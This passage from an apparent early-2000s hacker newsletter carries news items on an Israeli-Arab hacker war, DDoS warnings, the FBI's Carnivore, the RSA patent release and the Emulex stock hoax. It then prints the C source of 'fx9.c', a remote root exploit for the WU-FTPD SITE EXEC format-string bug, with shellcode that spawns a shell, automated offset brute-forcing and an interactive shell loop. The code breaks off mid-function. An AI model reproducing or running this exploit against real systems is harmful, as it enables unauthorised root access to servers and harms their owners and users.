you say to me that you are going to stop the virtual war? Sammy: I thought we haven't started yet? m0nk3y of Arab: LOL [laugh out loud] Sammy. Sammy: No, for real. Miki: We also can do a lot of damage on the Lebanon sites and servers but … It's not OK and right to do it. m0nk3y of Arab: Lebanese servers are not the only Arab servers, miki. Miki: I know, there's a lot in the U.S. m0nk3y of Arab: If you stop attacks from Lebanon, you will find a lot from others. Sammy: Anyhow, no hacker in his right mind would do this for fun, there is an important cause that arose recently. We didn't start this, we didn't start the war in Palestine. m0nk3y of Arab: As I said, what we did is a reaction to what's happening. Sammy: I wish for every Arab to look deep inside of him and do what is right … an eye for an eye. Miki: So I see that you want to continue this war? Sammy: This is a small part of a big world. m0nk3y of Arab: Miki, do you think you can control this cyberwar? Miki: No, you and not me can stop it because we are not [responsible for] all the hacking. m0nk3y of Arab: Exactly right. Raw emotions come to the fore. m0nk3y of Arab: Miki, can you give us a general background what you were doing during your military service? Were you hitting Palestinians? Miki: No, I didn't. But, dear friend, don't think that we are the bad guys. m0nk3y of Arab: I didn't say that. What do you feel if you see an Israeli soldier enjoying killing a Palestinian? Miki: We can't stop this war, but we can put it down. m0nk3y of Arab: How, miki? Explain. Miki: Believe me. For the Palestinians it's their independence war. You see, Sammy, how could anyone shoot a kid and have a smile on his face? Sammy: Have you been watching the news? Pictures. Miki: Tell me, did you see the crowd of Arabs from Ramallah [in the West Bank] lynching 2 Israeli soldiers? Miki: Yes. Sammy: Do you remember Hitler? Miki: Yes, I do. Sammy: Arabs feel the same about the Jews. m0nk3y of Arab: Soldiers are different than unarmed civilians. Miki: Why do you dislike the Israelis? m0nk3y of Arab: I hate their actions, not them personally. Sammy: Mass killings of innocent kids is shameful and disgusting. Miki: So you think that if you hack some Israeli sites you will fix the problem? Miki: We need to talk. Sammy: Talk talk talk! We've done sooo much talking and no action. Realizing he will not persuade his adversaries to call off the hacker war, Bouzaglo tries another tactic. Somewhat naively, he tries to find out if his chat partners have any information about three Israeli soldiers who were kidnapped last month by Hezbollah, the Lebanese guerrilla movement. M0nk3y appears to misunderstand and thinks Bouzaglo is trying to argue that the kidnappings justify Israel's actions against Palestinians. Miki: Do you know something about the 3 Israeli soldiers? m0nk3y of Arab: They are soldiers, not civilians, miki. m0nk3y of Arab: I don't enjoy shooting kids. Miki: Please, do you know something about it? m0nk3y of Arab: No, miki. Miki: So, dear Monkey, can you get info about it? m0nk3y of Arab: Don't take it personally, miki. Israeli Underground Press release: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** IMPORTANT NET SECURITY PRESS RELEASE *** To your attention: According to Wired News, CNN, Cnet and other reliable sources, phase three and four of the Israeli-Arab cyber war has begun. That means, attacks on the Israeli Internet infrastructure and the intrusion into Israeli e-commerce sites are the next step in what we experienced lately as cyber vandalism. With this information, and additional insider information, which sites are going to be attacked in the near future, IIU, the Israeli Internet Underground, decided to set up the "SODA" Project. With this project they want to warn about the coming danger and to announce publicly all endangered Israeli sites. The "SODA" Project mainly consist of a list on a public web site, that lists all the Israeli websites which bear security vulnerabilities and likely to be broken into by Islamic groups in the near future. IIU addressed 2xs Ltd. in the hope to find a company that is willing to support their non-profit project and to provide it with solutions. 2xs Ltd. agreed to provide consulting and solutions free-of-charge for a certain time, and is also trying to motivate other Israeli security companies to take part in this project and to offer "first-aid" solutions to all the endangered sites, free-of charge as well. IIU sees that Israeli Internet security is seriously endangered and that precaution must be undertaken very fast. This is a call for everybody to have a close look at the security situation of the Israeli Internet and to act. 2xs Ltd. is asking you to publish this information and to help us motivating the Internet community and security companies in Israel, to provide help where necessary. Also, not only single sites are endangered, but the planned and upcoming attacks might have a serious impact on the Israeli economy, therefore concerning all of us. We thank you in advance for seriously looking into this matter. Further info: To whom it may concern, I'm forwarding you a message of the "IIU", a non-profit security group from Israel who have contacted me. I'm sending this on to you since they would like to stay anonymous. As a response to the recent attacks against sites in Israel, they've put up a page with vulnerability information about hosts in Israel at www.iiu.org.il in an attempt to stop the ongoing attacks, to generate security awareness and to let companies look up their host to see if they need to apply more security measures to their sites. Mixter ---------- Forwarded message ---------- Date: Thu, 8 Nov 2000 21:03:06 +0200 (IST) To: mixter@newyorkoffice.com Subject: Important I'm writing you on behalf of the Israeli Internet Underground. We are a group of "white-hats" (ethical hackers) determined to protect the Israeli internet from attacks from malicious groups in the name of the Israeli spirit. As you may know, many sites and service providers in Israel are suffering from cyber attacks by certain anti-Israel groups of malicious hackers. We have reason to believe that attacks are shifting from Denial Of Service attacks to server break-ins and attempted compromise of resources such as e-commerce sites and large institutions, and this is going to get worse very soon. IIU is putting all its effort into drastically improving security for Israeli sites, and increasing the security awareness. Therefore, IIU has contributed all it's resources and information about the security problems in the infrastructure of the Internet sites in Israel, and together with a local security company, 2XS Ltd., we generated a comprehensive list of sites and networks in Israel which are vulnerable to and could fall victim to digital break-ins, and a separate report with descriptions and security fixes for each site. We are providing this list under the following URL: http://www.iiu.org.il We sincerely hope you understand the importance of this project and that you will support us in generating awareness among Israel's Internet community by forwarding this mail, spreading the word about this resource, and adding a link or a banner to our site. Please do not hesitate to contact us regarding any questions you might have. Of course, we have taken appropriate steps to protect this critical information from misuse. We are providing names and network ranges of every vulnerable site in Israel, which can be browsed on the site. With thanks and regards, The Israeli Internet Underground @HWA 343.0 [IND] NOCPulse and ISS warn of impending DDoS attacks this Christmas ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ISS' Web site is at http://www.iss.net . NOCpulse's Web site is at http://www.nocpulse.com . Reported by Newsbytes.com, http://www.newsbytes.com Byline: Denial of Service Attacks Planned For Christmas - ISS By Steve Gold, Newsbytes ATLANTA, GEORGIA, U.S.A., 17 Nov 2000, 12:35 PM CST X-Force, the research and development (R&D) team of Internet Security Systems [NASDAQ:ISSX] (ISS), has warned that hackers are planning an online attack-fest this coming Christmas. The attacks, if they occur, will take the form of distributed denial of service (DDOS) invasions, a hacker flooding technique used earlier this year - and since - to effectively flood out a major Web site and prevent normal users from gaining access, ISS said. The technique was used in February of this year when Amazon, Buy.com, CNN Interactive, eBay and a number of other high-profile sites were downed by hackers, apparently using DDOS applications known as "Trinoo," "Stacheldraht" and "TFN2K." ISS was one of the first IT security companies to issue an advisory over DDOS attacks back in early February, warning Web site managers to be aware that the offending applications could bring down an enterprise network or e-commerce site by flooding it with large amounts of traffic. In addition, the firm advised that, while there is little that sites can do to prevent such attacks, companies can take steps to ease the pain, including assembling an incident response team, tapping resources from the organization's Internet service provider (ISP) and the computer emergency response team (CERT) advisory team. ISS has also advised organizations to establish links with local law enforcement authorities, so that, if an attack occurs, the appropriate people can be notified quickly. A spokesperson for ISS told Newsbytes that the firm has detected a definite pattern amongst DDOS attacks and, coupled with its knowledge of the hacker community, is warning major sites to be on alert for attacks this Christmas. The need for preparation amongst major Web site operators is great, the company says; only 10 percent of Web sites with e-commerce operations have preparations in place. In parallel with its warning of impending DDOS attacks this Christmas, ISS has teamed up with NOCpulse, a newly launched provider of outsourced Internet infrastructure management services, to deliver managed security services to customers. As an emerging services provider, NOCpulse plans to add ISS' managed security service offerings and operational expertise to major customers, As a result, ISS says that NOCpulse customers will have access to key managed security services offerings as well as top notch security expertise. Mark Hangen, ISS' general manager of managed security services, said that NOCpulse represents a new breed of managed service provider (MSP) that can give companies the information they need to proactively manage their Internet infrastructure. Paul Anatinelli, NOCpulse's founder and president, meanwhile, said that the NOCpulse command center is the first Internet operational support service (IOSS) designed to give customers full control over their Internet infrastructure, ISS' Web site is at http://www.iss.net . NOCpulse's Web site is at http://www.nocpulse.com . Reported by Newsbytes.com, http://www.newsbytes.com . 12:35 CST (20001117/Press Contact: David Bridson, ISS +44-20-7626-7070; Michell Norwood, ISS 678-443-6000 /WIRES TOP, ONLINE, LEGAL, PC/DOTCOMATTACK/PHOTO) -=- http://www.nocpulse.com/ About NOCpulse NOCpulse is an Internet Operational Support Service company that provides the strategy, systems and information that businesses need to proactively manage their Internet infrastructure. How We Started Industry veterans from organizations including Excite@Home and Global Crossing (formerly GlobalCenter) founded NOCpulse in April 2000. Market Need Faced with the twin challenges of managing Internet operations while scaling for the future, web-critical businesses are quickly overwhelmed by the intense need for both human and capital resources. NOCpulse alleviates this pressure by offering an outsourced Web infrastructure management service, putting proactive control back in the hands of IT staff. The NOCpulse Command CenterSM The NOCpulse Command Center is the industry's first Internet Operational Support Service (IOSS), empowering businesses with total control over their Internet infrastructure. By deploying the NOCpulse Command Center, a company will dramatically reduce the total cost associated with the operation of web environments and gain the intelligence to grow proactively and optimize its operations. Outsourcing Internet management operations through NOCpulse will allow companies to more efficiently deploy their human capital investments while sharpening their awareness of system operations. IT personnel can re-focus on delivering real value to the core business competencies of a company. The NORAD of the Internet Deep within Cheyenne Mountain, Colorado, the NORAD command and control center serves as a central collection and coordination facility for a worldwide system of sensors designed to provide an accurate picture of US and Canadian airspace. Like NORAD, NOCpulse serves and protects its customers through superior information used to watch, respond and protect their Internet infrastructure. Management Executive Paul Santinelli, President and Founder Steve Springsteel, Chief Financial Officer Jon Prall, Sr. VP, Technology Dan Nater, VP, Operations Jim Gerber, VP, Sales Dave Parker, Principle Engineer Board of Directors Paul Santinelli, President and Founder David Sze, General Partner, Greylock Angelo Santinelli, General Partner, North Bridge Venture Partners Board Observers David Strohm, General Partner, Greylock Richard D'Amore, General Partner, North Bridge Venture Partners Funding Series A, April 2000: $12 Million, Greylock and North Bridge Venture Partners Contact Info: NOCpulse, Inc. 1293 Mountain View Alviso Road, Suite D Sunnyvale, CA 94089 (408) 542-2800 www.nocpulse.com info@nocpulse.com 344.0 [IND] Oct 2000: Carnivore does more than previously thought ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.theregister.co.uk/content/1/13767.html Carnivore does more than previously thought By: Thomas C Greene in Washington Posted: 05/10/2000 at 14:49 GMT Heavily censored FBI documents obtained by US watchdog outfit the Electronic Privacy Information Centre (EPIC), under a Freedom of Information Act (FOIA) lawsuit, indicate that the FBI's electronic snoop known as Carnivore might be able to monitor a good deal more than just e-mail traffic. Among the capabilities that peek out from behind all the indelible black swaths in the documents is an ability to reconstruct an entire Web page as viewed by a subject. A planned, updated version may even be able to capture voice-over-Web communications. Presently the system can capture and record all packet traffic to and from a selected IP, while monitoring a subject's on-line movements. These extra capabilities underscore the controversial issue of FBI reliability in restraining itself when authorised to view only e-mail headers. This is a crucial point, because the Bureau can obtain the on-line equivalent of a pen register order (recording the destinations of out-going communications) or a trap and trace order (recording the origins of in-coming communications) without a warrant signed by a judge. Because of the lower standard, the contents of such communications must not be intercepted. For such limited surveillance the standard of evidence is quite low: the FBI need merely be prepared to prove that the information sought could be material to an investigation. To snoop on the actual content communicated - the on-line equivalent of a telephone wiretap - the FBI must satisfy a judge that a crime is likely to be committed. Some judges hand out wiretap orders as if they were parking tickets; others will laugh one out of chambers for producing less than a smoking gun in evidence. The system is far from perfect, but on balance it does a tolerable job of keeping most of the Feds at an appropriate distance most of the time. But many fear that the FBI could broaden its on-line snooping under limited surveillance orders, succumbing to temptation provided by Carnivore's additional capabilities. Suppose, for example, that FBI agents were to obtain a pen register and/or trap and trace order for a subject, but then go a bit further on their own. Would anyone be the wiser? And what becomes of information collected illegally? It's useless in court, being the poisonous fruit of a forbidden tree. But suppose it were sufficient to tip off the Feds to a criminal act for which they could later obtain evidence legitimately. They wouldn't have known about it if they hadn't broken the law, but they'll build a case in court based on evidence gathered legitimately. Would anyone be the wiser? One possible solution to these concerns would be for the FBI to develop a bare-bones version of Carnivore, capable of intercepting nothing more than e-mail headers, to be used for the on-line equivalent of trap and trace and pen register orders. Thus the full-scale Carnivore with its additional capabilities would be authorised for use only when a wiretap order had been issued by a judge. This wouldn't be a guarantee against abuse of limited snooping authority, but it would add an extra layer of protection for subjects, and a bit more credibility to FBI claims of conscientious self-regulation. Abuse would require a wider circle of cooperation, and so increase the likelihood that an overzealous agent would be caught with his hand in the cookie jar by a supervisor. ® @HWA 345.0 [IND] Surprise! RSA releases crypto patent ahead of schedule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.zdnet.com/eweek/stories/general/0,11011,2624678,00.html Surprise! RSA releases crypto patent ahead of schedule By Scott Berinato, eWEEK September 6, 2000 11:19 AM ET RSA Security Inc. today pulled the tablecloth from underneath its competitors' plates, releasing its cryptographic algorithm into the public domain two weeks early. The patent on RSA's crypto technology, which is widely employed in the security realm, would have expired September 20, exactly 17 years after the patent was issued to the Massachusetts Institute of Technology and licensed exclusively to RSA. The 20th has been widely considered a watershed date, circled on the calendards of many security company executives' calendars. Some companies, like Baltimore Technologies Inc., were using the expiration of the patent as a springboard for new products and marketing campaigns. RSA CEO Art Coviello told eWEEK that the company wanted to get this milestone out of the way because it was garnering too much attention and confusing customers. "Someone asked me if I had thought about extending the patent, and that's the thing," Coviello said. "The idea of extending the patent hadn't even occurred to us because it's just not part of our business. Why would we not want this to be the de facto standard in the public domain? So now it's out there." Coviello also said that the expiration of patent number 4,405,829 hasn't affected the company's strategic direction, which appears to remain focused on technology. While other companies are hurriedly extending into managed security services, RSA wants to remain a company entrenched in code. "We're not schizophrenic," Coviello said. "We know who we are. We won't try to be something we're not. I don't think you can execute on a managed services model and a product model at the same time." @HWA 346.0 [IND] Hackers: The millennial scapegoats? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.theregister.co.uk/content/6/12010.html?&_ref=233393570 Hackers: The millennial scapegoats? By: Kieren McCarthy Posted: 18/07/2000 at 15:59 GMT The leak of a confidential memo outlining PM Tony Blair's concerns that New Labour is out of touch with the electorate appears to have been pinned on hackers. The leak came as an embarrassment to the government, especially considering recent criticism of its policies. After the memo came to light, papers were quick to point out the significance of it only being sent to close confidants of the prime minister. Who is the mole?, was the question posed by many editorials. However, after a day's reflection, a different explanation from the traditional frustrated-minister-leak has taken hold. Number 10, the theory holds, has been hacked and this explains not only this leak but other embarrassing revelations that have come out in recent months. This is an extremely tough call to make. On the one hand, this explanation is a near-perfect political answer to a nasty situation. On the other, it's all too plausible. Faced with the situation, and assuming it was a leak by a senior government source, this hacker theory has enormous political advantages. It is already in the public domain, so damage limitation is the order of the day. The hacker story will pull media attention off its search for who leaked the material and push it towards computer security concerns. Aside from lifting scrutiny and pressure on the party, it also produces a smokescreen behind which Labourites can try to find who actually released the information. Building on the idea that it has been hacked will also provide the government with a certain degree of sympathy - most people have had their privacy invaded at some point and know that reality is often very different from the perceived truth. On top of this, this whole situation elevates the issue of computer security and thus Internet technology and the digital world. It's what's called making the best of what you've got. But then, of course, it may be a hack job. Whitehall has been pushing through some fairly hefty IT projects recently in its bid to make the government totally Internet-enabled by 2005. When things go this fast, it only needs one civil servant with an astute IT knowledge to find a hole in the system. Once that hole is found, and with people rushing ahead with other projects, it is not inconceivable that you could gain and fortify a foothold in the government's IT system. A very useful foothold to have. The recent defacing of the Cabinet Office Web site also points to the fact that Downing Street has been targeted by hackers. "Senior sources" have also pointed out that recent leaks have had one thing in common: they have been sent via email. What's the truth of this? Well, we would apply the if-it-sounds-too-perfect-it-ain't-true rule. In this case, we don't believe a word of it. Getting cynical for a moment, it is not even inconceivable that this is an intentional leak. If you look at it, the memo basically says that Tony Blair actually has his finger on the UK's pulse by, er... not having his finger on the pulse. He is seen to be answering the press' concerns, he is concerned about the British public blah blah blah. So what is actually going on? We really couldn't tell you. But whatever story you believe, it does demonstrate one thing: that the government has become far more tech-savvy than at any time in the past. As ever, this will have negative and positive effects on the UK's democracy. ® @HWA 347.0 [IND] Student Arrested in Emulex Hoax Case ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.zdtv.com/zdtv/zdtvnews/politicsandlaw/story/0,3685,9239,00.html Student Arrested in Emulex Hoax Case By Maria Godoy, TechTV News August 31, 2000 FBI officials today arrested a 23-year-old Southern California student in connection with a fake press release that triggered a 50 percent plunge last Friday in the stock price of technology company Emulex. Mark Simeon Jakob, a resident of El Segundo, California, was taken to a Los Angeles County courthouse around 11 a.m. Pacific Thursday and charged with multiple felonies, including wire fraud, acting with intent to defraud, participating in a scheme to defraud, and securities fraud. He faces a maximum penalty of 15 years in prison. Until August 18, Jakob had been an employee of Internet Newswire, the Web-based corporate news service that distributed the bogus press release, and he knew how to navigate its system to get a hoax release through, authorities said. "The suspect, we believe, realized about a quarter of a million dollars in profits from trades he made around the time of the fake press release," Mrozek said. The fake Emulex press release said the company was restating its earnings, was under investigation by the Securities and Exchange Commission, and that its chief executive had quit. FBI agents traced the bogus release to an email sent last Thursday night from a computer in the library of El Camino Community College, where Jakob is a student. Thom Mrozek, a spokesman for the US attorney's office in Los Angeles, said Jakob was seen using a PC in the school library that night. Last Friday, investors reacting to the hoax release began frantically selling off shares in Emulex, which lost about $2.5 billion in value in a matter of hours. After Nasdaq halted trading in the stock, and the company said the information was false, shares recovered nearly all the losses. Short-selling scam gone wrong According to authorities, Jakob staged the press release hoax in order to avoid heavy losses from a short-selling scam gone wrong. Investors who sell stock "short" borrow shares from a financial institution, betting that the price will fall at some future date. The shares are later replaced at a lower price, and the trader pockets the difference. Jakob allegedly shorted more than 3,000 Emulex shares two weeks ago, selling them at between $72 to $92 a share. However, Emulex share prices did not drop as Jakob had expected, climbing instead to more than $100 by late last week. To avoid potentially steep losses, Jakob manipulated the stock price to plummet. He replaced his borrowed shares at the lower price, reaping a profit of more than $50,000. As Emulex stock continued to plunge, Jakob bought up more shares, selling them three days after the stock price had recovered for a $186,000 profit. This is not the first time a fake press release has been used to influence a company's stock. In 1999, Gary Hoke of North Carolina was fined $93,000 and sentenced to five years probation after he falsely reported that PairGain Technologies was about to be sold to an Israeli company. @HWA 348.0 [EXP] fx9.c WuFTPD < 2.6.1 exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * THIS IS PRIVATE!! DO NOT DISTRIBUTE!! VERY MUCH PRIVATE!! * * fx - BETA9 - WU-FTPD REMOTE ROOT EXPLOIT * Exploits the format bug on the call SITE EXEC in wu-ftpd < 2.6.1 * * Greets to: All spanish coders in the dark :) * * The Dark Raver * (23/08/2000 - Spain) * * Tired of trying other wu-ftpd exploits and they dont work?? * Tired of waiting for very slow ways of exploiting?? * Tired of using exact offsets that never works?? * * This is your exploit!!!! It tests differents aligns, lengths, sizes * and offsets until it found the shell. * * Usage: fx9 [offset] [eat] [align] [address] [-d] [-f] * [offset] -> The position of the stack where is stored some eip * [eat] -> The number of %.f used * [address] -> The address in memory of our shellcode, can be stack or heap * [-d] -> Use debug, more output and control over the calculation process * [-f] -> Force values, dont test if values are correct * * The code sucks, but work 90% of times on 90% of vulnerable wu-ftpd for * linux. Just play with the values. * * Example: Offset Ret Eat-Align * SuSe 6.3 wuftpd.rpm 2.6.0-20 0xbfffae68 0xbffffd9b 137-2 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 0xbfffd074 0xbfffdd14 137-2 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 0xbfffae68 0xbffffd9b 137-2 * SuSe 6.3 wuftpd.rpm 2.6.0-20 0xbfffce94 0xbfffd6d4 137-2 * Caldera 1.1 wu-2.4.2-academ[BETA-15](1) 0xbfffec14 0xbffffee0 5-2 * SuSe 5.1 wuftpd-2.4.2beta15-5 0xbfffeafc 0xbffffdf8 5-2 * ?? wu-2.4(1) 0x???????? 0x???????? 5-6 * ?? wu-2.4(4) 0xbffff0dc 0xbffffe14 5-2 * RedHat 5.0 wu-ftpd-2.4.2b15-5 0xbfffef28 0xbffffdf4 5-2 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 0xbfffae68 0x8075a10 137-2 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 0xbfffae68 0x8076cb0 137-2 * * * !!NOTE!! Dont use offsets with the chars 0x00 (dont be lamer! ;) * * !!NOTE!! wu-ftpd converts to lowercase so most 0x41-0x5A will be converted * to another values. * * !!NOTE!! The shellcode and some strings printed in the screen can corrupt * your terminal simply ^Z, reset and fg. * * Para Omnis la mejor y la imposible: * * "Hoy la tierra y los cielos me sonrien, * Hoy llega al fondo de mi alma el sol, * Hoy la he visto... la he visto y me ha mirado... * Hoy creo en Dios!" * */ #include #include #include #include #include #include #include #include #include #include #include #include #include int debug=0; // change this if you want output int force=1; #define EAT 137 #define TOEIP 0xbfffae68 #define ALIN 2 #define RETN 0xbffffd9b #define BUFLEN 1024 #define BIGBUF 10000 #define INICIO 0x245 void conectar(char *host); void term(void); void mkcode1(void); void mkbuf(void); void mkini(void); void mkalin(void); void mksh(void); void status(void); char code1[40]; // nops + suid + break chroot + sh char code2[]= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x4f\x31\xc0\x31\xc9\x5e\x88" "\x46\x07\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed\xcd\x80\x31\xc0\x8d" "\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1\xd0\xff\xff\xf7\xdb" "\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03\xe0\xf9\x5e\xb0" "\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x89\x76\x08\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xac\xff\xff\xff\xff" "\xff\xff/bin/sh"; char code3[8]; // Global variables rulez!!! ;) int alin=ALIN; int eat=EAT; unsigned int toeip=TOEIP; unsigned int retn=RETN; char buf[BUFLEN]; int inicio=INICIO; int opt=1; int sock; struct sockaddr_in sa; struct hostent *hp; int main(int argc, char *argv[]) { char mbuf[BIGBUF]; int c; char *str; while ((c = getopt(argc,argv,"df"))!= -1){ switch (c) { case 'd': printf("Debug active\n"); debug=1; break; case 'f': printf("Forcing values\n"); force=0; break; } } argc -= optind; argv += optind; //printf("%i\n", argc); if(argc!=5) { fprintf(stderr,"Usage: fx [offset] [eat] [align] [address] [-d] [-f]\n"); if(argc==1) { printf("Using default values: offset=%x eat=%i align=%i add=%x\n", toeip, eat, alin, retn); } else { exit(0); } } printf("1. Connecting...\n"); if(debug) getchar(); conectar(argv[0]); printf("2. Calculating eat...\n"); if(debug) getchar(); if(argc>=3) { sscanf(argv[2], "%i", &eat); } else { eat=EAT; } // The real spaghetti coding!!! ;) if(force) { eat--; do { eat++; memset(code1,0x30,40); mkalin(); send(sock,buf,strlen(buf),0); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); str=strchr(mbuf,'|'); if(str==0) { printf("Unable to complete search!\n"); exit(-1); } str[9]='\x00'; printf("Using eat: %i\n", eat); printf("<%s>\n\n",str); if(!(strncmp(str,"|30303030",9))) { opt=0; } memset(mbuf, 0, BIGBUF); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); memset(mbuf, 0, BIGBUF); if(debug) getchar(); } while(opt); opt=1; } printf("Eat OK: %i\n", eat); printf("3. Calculating align...\n"); if(debug) getchar(); if(argc>=4) { sscanf(argv[3], "%i", &alin); } else { alin=ALIN; } if(force) { alin--; do { alin++; toeip=0x31313131; mkcode1(); mkalin(); send(sock,buf,strlen(buf),0); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); str=strchr(mbuf,'|'); if(str==0) { printf("Unable to complete search!\n"); exit(-1); } str[9]='\x00'; printf("Using align: %i\n", alin); printf("<%s>\n\n",str); if(!(strncmp(str,"|31313131",9))) { opt=0; } memset(mbuf, 0, BIGBUF); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); memset(mbuf, 0, BIGBUF); if(debug) getchar(); } while(opt); opt=1; toeip=TOEIP; } printf("Align OK: %i\n", alin); printf("4. Calculating inital length...\n"); if(debug) getchar(); if(argc>=2) { sscanf(argv[1], "%x", &toeip); } else { toeip=TOEIP; } if(force) { mkcode1(); mkini(); send(sock,buf,strlen(buf),0); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); str=strchr(mbuf,'|'); if(str==0) { printf("Unable to complete search!\n"); exit(-1); } inicio=str - mbuf - 4; memset(mbuf, 0, BIGBUF); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); memset(mbuf, 0, BIGBUF); if(debug) getchar(); } printf("Start OK: %x\n", inicio); // It search in the remote memory!! wow!! :) printf("5. Searching for shellcode\n"); if(debug) getchar(); if(argc>=5) { sscanf(argv[4], "%x", &retn); } else { retn=RETN; } if(force) { retn-=0x40; do { retn+=0x40; toeip=retn; mkcode1(); mksh(); send(sock,buf,strlen(buf),0); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); str=strchr(mbuf,'|'); if(str==0) { printf("Unable to complete search!\n"); exit(-1); } str[5]='\x00'; printf("Using ret: %x\n", retn); printf("<%s>\n\n",str); if(!(strncmp(str,"|AAAA",5))) { opt=0; } memset(mbuf, 0, BIGBUF); c=recv(sock, mbuf, sizeof(mbuf), 0); if(debug) puts(mbuf); memset(mbuf, 0, BIGBUF); if(debug) getchar(); } while(opt); opt=1; } printf("Address of the shellcode OK: %x\n", retn); printf("6. Sending attack...\n"); if(argc>=2) { sscanf(argv[1], "%x", &toeip); } else { toeip=TOEIP; } status(); if(debug) getchar(); do { printf("Using Offset: %x\n", toeip); mkcode1(); mkbuf(); send(sock,buf,strlen(buf),0); printf("Waiting for shell...\n\n"); term(); printf("Logged out...\n"); if(debug) getchar(); printf("Reconecting...\n"); if(debug) getchar(); close(sock); fflush(stdout); conectar(argv[0]); } while(opt); printf("Ending..."); if(debug) getchar(); close(sock); fflush(stdout); exit(0); } void conectar(char *host) { char cbuf[BUFLEN]; int c; memset(cbuf, 0, BUFLEN); if((hp=(struct hostent *)gethostbyname(host))==NULL) { perror("gethostbyname()"); exit(0); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } sa.sin_family=AF_INET; sa.sin_port=htons(21); memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()"); exit(0); } printf("Connected to %s\n",host); printf("Reading...\n"); c=recv(sock, cbuf, sizeof(cbuf), 0); if(debug) puts(cbuf); if((strncmp(cbuf, "220 ", 4))==0) { memset(cbuf, 0, BUFLEN); } else { if((strncmp(cbuf, "220-", 4))==0) { memset(cbuf, 0, BUFLEN); c=recv(sock, cbuf, sizeof(cbuf), 0); if(debug) puts(cbuf); memset(cbuf, 0, BUFLEN); } else { printf("Wrong ftp server\n"); exit(-1); } } printf(">> user ftp\n"); sprintf(cbuf,"user ftp\n"); write(sock,cbuf,strlen(cbuf)); c=recv(sock, cbuf, sizeof(cbuf), 0); if(debug) puts(cbuf); if(strncmp(cbuf, "331", 3)) { printf("Anonymous ftp not allowed\n"); exit(-1); } memset(cbuf, 0, BUFLEN); printf(">> pass %s@mail.com\n", code2); sprintf(cbuf,"pass %s@mail.com\n", code2); write(sock,cbuf,strlen(cbuf)); c=recv(sock, cbuf, sizeof(cbuf), 0); if(debug) puts(cbuf); if((strncmp(cbuf, "230 ", 4))==0) { memset(cbuf, 0, BUFLEN); } else { if((strncmp(cbuf, "230-", 4))==0) { memset(cbuf, 0, BUFLEN); c=recv(sock, cbuf, sizeof(cbuf), 0); if(debug) puts(cbuf); memset(cbuf, 0, BUFLEN); } else { printf("Wrong password\n"); exit(-1); } } printf("Logged\n"); } void term(void) { char sbuf[BUFLEN]; fd_set rfds; int x; sprintf(sbuf, "QUIT\nuname -a; id;\n"); send(sock, sbuf, strlen(sbuf), 0); while (1) { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); if(select((0 > sock ? 0 : sock) + 1, &rfds, NULL, NULL, NULL) < 1) return; if(FD_ISSET(sock, &rfds)) { if((x = read(sock, sbuf, sizeof(sbuf))) < 1) return; write(0, sbuf, x); } if(FD_ISSET(0, &rfds)) { if((x = read(0, sbuf, sizeof(sbuf))) < 1) return; write(sock, sbuf, x); } } } void mkcode1(void) { int i; int c; memset(code1,0x30,40); i=alin; for(c=0;c<4;c++) { code1[i]=(toeip & 0xff); if(code1[i]=='\xff') { i++; code1[i]=(toeip & 0xff); } i++; code1[i]=((toeip & 0xff00) >> 8); if(code1[i]=='\xff') { i++; code1[i]=((toeip & 0xff00) >> 8); } i++; code1[i]=((toeip & 0xff0000) >> 16); if(code1[i]=='\xff') { i++; code1[i]=((toeip & 0xff0000) >> 16); } i++; code1[i]=((toeip & 0xff000000) >> 24); if(code1[i]=='\xff') { i++; code1[i]=((toeip & 0xff000000) >> 24); } i=i+5; toeip++; } i=i-4; code1[i]='\x00'; } void mkbuf(void) { char *ptr = buf; int r1, r2, r3, r4; int i; memset(buf, 0, 1024); ptr = &buf[strlen(buf)]; sprintf(ptr, "site exec "); ptr = &buf[strlen(buf)]; for(i=0; i < strlen(code1);i++) { sprintf(ptr,"%c", code1[i]); ptr = 